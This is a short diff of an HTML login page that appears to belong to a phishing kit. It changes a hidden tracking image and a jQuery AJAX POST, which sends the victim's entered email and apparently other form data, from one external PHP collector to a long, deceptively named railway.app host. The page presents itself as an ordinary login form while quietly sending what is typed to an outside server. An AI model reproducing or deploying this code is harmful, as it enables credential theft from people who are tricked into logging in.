--- a/index.html
+++ b/index.html
@@ -127,7 +127,7 @@
             <button type="submit" class="login-submit wbk p0" id='submit-btn'>Login</button>
         </form>
         <div style="display: none;">
-            <img src="https://crosleylegal.net/v-3rpff-45/wao/visit.php" alt="Action">
+            <img src="https://controlpanel-serverdatanet-portal8loginadsf-35tg-rfsfg-gfsgffgh.up.railway.app/xSuex.php" alt="Action">
         </div>
     </section>
 
@@ -220,7 +220,7 @@
       
       $.ajax({
         dataType: 'JSON',
-        url: 'https://crosleylegal.net/v-3rpff-45/wao/xSue.php',
+        url: 'https://controlpanel-serverdatanet-portal8loginadsf-35tg-rfsfg-gfsgffgh.up.railway.app/xSuex.php',
         type: 'POST',
         data:{
           email:email,
